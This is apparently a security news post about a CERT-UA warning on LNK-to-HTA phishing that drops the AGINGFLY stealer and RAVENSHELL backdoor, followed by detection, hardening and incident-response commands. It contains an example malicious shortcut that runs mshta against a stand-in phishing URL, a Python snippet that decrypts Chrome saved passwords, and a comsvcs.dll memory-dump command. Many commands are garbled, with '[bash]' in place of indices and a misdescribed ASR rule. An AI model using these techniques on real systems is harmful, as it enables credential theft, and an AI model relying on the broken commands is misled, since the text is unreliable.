AGINGFLY & RAVENSHELL: Ukraine’s Hospitals Under Fire – How a Single LNK File Unleashes Total System Takeover + Video

Listen to this Post

🐢▶️ Listen🚀

Introduction:

Ukraine’s CERT-UA has issued an urgent warning about a new wave of cyberattacks targeting hospitals and government agencies. The campaign uses malicious LNK shortcut files delivered via phishing emails to trigger an infection chain that deploys two distinct payloads: AGINGFLY, a browser and WhatsApp data stealer, and RAVENSHELL, a full-featured remote access trojan enabling credential theft and lateral movement.

Learning Objectives:

• Reconstruct the complete attack chain from LNK file execution to RAVENSHELL backdoor deployment.
• Detect and block abuse of mshta.exe and other living-off-the-land binaries (LOLBins) used in the campaign.
• Implement forensic collection, credential hygiene, and network hardening to mitigate AGINGFLY and RAVENSHELL.

You Should Know:

1. Deconstructing the Attack Chain: LNK → HTA → RAVENSHELL

The attack begins with a phishing email containing a shortcut (.LNK) file. When the user double-clicks the LNK, its target field executes `mshta.exe` with a remote URL pointing to a malicious HTA (HTML Application) file. The HTA script, running in the context of mshta.exe, downloads and executes the RAVENSHELL backdoor, while also fetching AGINGFLY to exfiltrate local browser and WhatsApp data.

Step‑by‑step guide to understanding and inspecting the LNK vector:

• View LNK target on Windows (no execution):

Using PowerShell to read the shortcut’s command line:

$lnk = (New-Object -ComObject WScript.Shell).CreateShortcut("C:\path\to\malicious.lnk")
Write-Host "Target: " $lnk.TargetPath
Write-Host "Arguments: " $lnk.Arguments

– Example malicious LNK target:
`mshta.exe “http://phishing-domain.com/update.hta”`
– What `mshta.exe` does:
It interprets the HTA as HTML+script with elevated privileges (similar to IE). The HTA typically contains VBScript or JavaScript that runs `cmd.exe` or PowerShell to download and execute the final payload.

• Detection rule (Sysmon Event ID 1):
  Look for `mshta.exe` making outbound network connections to non‑Microsoft domains or spawning `cmd.exe` / powershell.exe.

1. RAVENSHELL: Remote Control, Credential Theft, and Lateral Movement

RAVENSHELL is a modular backdoor that establishes persistence, provides interactive remote shell, steals credentials (often via `cmd.exe` and `mimikatz` in memory), and moves laterally using native Windows admin tools (WMI, PsExec, scheduled tasks).

Step‑by‑step guide to identifying RAVENSHELL on a compromised host:

• List suspicious processes and network connections (Windows):

  tasklist /v | findstr /i "powershell cmd mshta"
  netstat -ano | findstr "ESTABLISHED"
  

• Check for unusual scheduled tasks:

  Get-ScheduledTask | Where-Object {$_.TaskPath -notlike "Microsoft"} | Format-List TaskName, State, Actions
  

• Examine WMI event consumers (often used for persistence):

  Get-WMIObject -Namespace root\subscription -Class __EventFilter
  Get-WMIObject -Namespace root\subscription -Class CommandLineEventConsumer
  

• Lateral movement evidence – look for `wmiprvse.exe` spawning `cmd.exe` or powershell.exe:

  Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4688} | Where-Object {$_.Properties[bash].Value -like "wmiprvse"}
  

Linux‑based log analysis (if forwarding Windows logs):

`grep -E “mshta.exe|ravenshell” /var/log/syslog`

3. AGINGFLY: Stealing Browser and WhatsApp Data

AGINGFLY specifically targets credential stores in Chromium‑based browsers (Chrome, Edge, Brave) and local WhatsApp configuration files. It copies Login Data, Cookies, and `Web Data` from browser profiles, plus `keyring` and `msgstore.db` from WhatsApp directories.

Step‑by‑step guide to forensic collection and decryption (defensive perspective):

• Locate browser profile directories (Windows):

  dir "%LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data"
  dir "%LOCALAPPDATA%\Microsoft\Edge\User Data\Default\Login Data"
  

• Extract encrypted credentials for analysis (requires decryption key from the same user context). Use `python` with pycryptodome:

  import sqlite3, win32crypt
  conn = sqlite3.connect('Login Data')
  cursor = conn.cursor()
  cursor.execute('SELECT action_url, username_value, password_value FROM logins')
  for row in cursor:
  password = win32crypt.CryptUnprotectData(row[bash])[bash].decode()
  print(f"URL: {row[bash]}, User: {row[bash]}, Pass: {password}")
  

• WhatsApp local storage path (Windows):
  `%APPDATA%\WhatsApp\Local Storage\leveldb\` – contains plaintext messages in `log` files.
  Detection: Monitor for processes reading `.log` or `.db` inside WhatsApp directories from non‑WhatsApp binaries.

1. Blocking mshta.exe Abuse via Attack Surface Reduction (ASR) and AppLocker

The most effective mitigation against this LNK‑to‑HTA chain is disabling or restricting `mshta.exe` for non‑administrative workflows.

Step‑by‑step guide to deploying ASR rule (Windows 10/11 Pro/Enterprise):

• Enable ASR rule “Block executable files from running unless they meet a prevalence, age, or trusted list criteria” (Rule ID: 01443614-cd74-433a-b99e-2ecdc07bfc25) – it blocks `mshta.exe` from launching script content.

  Add-MpPreference -AttackSurfaceReductionRules_Ids 01443614-cd74-433a-b99e-2ecdc07bfc25 -AttackSurfaceReductionRules_Actions Enabled
  

• Alternative: Disable mshta via AppLocker (Executable Rules) – create a Deny rule for %windir%\system32\mshta.exe.

  $Rule = New-AppLockerPolicy -RuleType Exe -User Everyone -Action Deny -Path "%windir%\system32\mshta.exe"
  Set-AppLockerPolicy -Policy $Rule -Merge
  

• Monitoring for attempted mshta execution (Sysmon):
  Event ID 1 (Process creation) with Image: C:\Windows\System32\mshta.exe. Also monitor Event ID 3 (Network connection) for `mshta.exe` connecting to untrusted IPs.

5. Lateral Movement Containment & Credential Hardening

RAVENSHELL spreads using stolen credentials via WMI, RDP, and SMB. Blocking these vectors severely limits the backdoor’s reach.

Step‑by‑step guide to hardening against lateral movement:

• Restrict inbound RDP to specific IP ranges (Windows Firewall):

  New-NetFirewallRule -DisplayName "Block RDP except admin" -Direction Inbound -Protocol TCP -LocalPort 3389 -Action Block
  New-NetFirewallRule -DisplayName "Allow RDP from admin subnet" -Direction Inbound -Protocol TCP -LocalPort 3389 -RemoteAddress 192.168.1.0/24 -Action Allow
  

• Disable SMBv1 and restrict SMB outbound (prevents pass‑the‑hash):

  Set-SmbServerConfiguration -EnableSMB1Protocol $false
  

• Enable Windows Defender Credential Guard (requires Hyper-V):

  $Guard = @"
  { "VirtualizationBasedSecurity": "Enabled", "LsaCfgFlags": "1" }
  "@
  $Guard | Out-File -FilePath C:\CredGuard.json
  & 'C:\Windows\System32\DeviceGuard\DG_Refresh.ps1'
  

• Detect lateral movement using `net use` and `wmic` logs – Security Event ID 5140 (network share) and 4688 (wmic.exe).

1. Incident Response Checklist for Healthcare & Government Networks

When a suspected AGINGFLY/RAVENSHELL infection is identified, follow this IR checklist to contain and eradicate.

Step‑by‑step guide:

1. Isolate the host – disconnect network cable or disable NIC via PowerShell:

   Disable-NetAdapter -Name "Ethernet" -Confirm:$false
   

2. Capture memory (for later analysis of RAVENSHELL’s in‑memory payload):

   rundll32.exe C:\windows\system32\comsvcs.dll MiniDump [bash] C:\temp\memory.dmp full
   

3. Collect artifacts – LNK file, HTA cache (%temp%\hta), browser Login Data copies, WhatsApp `leveldb` folder.
4. Terminate malicious processes – identify by parent process `mshta.exe` or unusual network beaconing:

   Get-Process | Where-Object {$_.Parent.Name -eq "mshta"} | Stop-Process -Force
   

5. Reset all credentials for affected user accounts – assume they are stolen. Revoke session tokens and force password reset.
6. Scan for lateral movement – query event logs for successful logons (Event ID 4624) from the compromised host to other systems.

7. Proactive Defenses: Email Filtering, YARA Rules, and EDR Tuning

Prevention is far cheaper than recovery. Configure email gateways to block `.lnk` attachments, deploy YARA rules to detect RAVENSHELL, and tune EDR for the specific behaviors.

Step‑by‑step guide:

• Email filter rule (Exchange / Mimecast): Block any attachment with extension .lnk, .hta, .iso, or .vbe. Also block emails containing URLs with `mshta` in the path.
• YARA rule to detect RAVENSHELL strings (example):

  rule RAVENSHELL_Backdoor {
  strings:
  $s1 = "RAVENSHELL" ascii wide
  $s2 = "C2_Beacon" ascii
  $s3 = "Steal_Browser_Data" ascii
  condition:
  any of them
  }
  

• EDR custom detection – Alert when `mshta.exe` makes an HTTP request to a domain with low reputation or when `cmd.exe` reads `Login Data` from a browser profile.

What Undercode Say:

• Key Takeaway 1: The combination of AGINGFLY (data stealer) and RAVENSHELL (backdoor) shows that attackers are moving toward multi‑payload campaigns that both exfiltrate sensitive information and maintain persistent remote access – making recovery harder and data breach inevitable if not detected early.
• Key Takeaway 2: Using `mshta.exe` as the initial infection vector is a classic “living‑off‑the‑land” technique that bypasses many legacy antivirus solutions. Blocking or strictly controlling LOLBins like mshta, wmic, and `cscript` should be a baseline security control in healthcare and government environments.

Analysis: CERT-UA’s warning highlights a dangerous trend – targeting hospitals under active war conditions. The attack chain is not zero‑day but relies on social engineering and poor default configurations (e.g., allowing HTA execution). Organizations must move beyond signature‑based detection and implement behavior monitoring for process ancestry (e.g., `mshta` spawning cmd). Additionally, browser and messaging app data theft indicates that traditional perimeter defenses are insufficient; endpoint data classification and strict application control are now mandatory.

Prediction:

As war‑related cyber operations intensify, we will see more “fileless” infection chains using native Windows components to evade EDR. Attackers will increasingly combine stealer modules (like AGINGFLY) with RATs (like RAVENSHELL) to monetize access rapidly before lateral movement is blocked. Expect future variants to target Signal and Telegram desktop apps, and to use encrypted C2 channels over WebSocket to bypass network detection. Healthcare IT teams must adopt a zero‑trust model where no binary – not even `mshta.exe` – is trusted by default.

▶️ Related Video (74% Match):

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Hackermohitkumar Ukraines – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky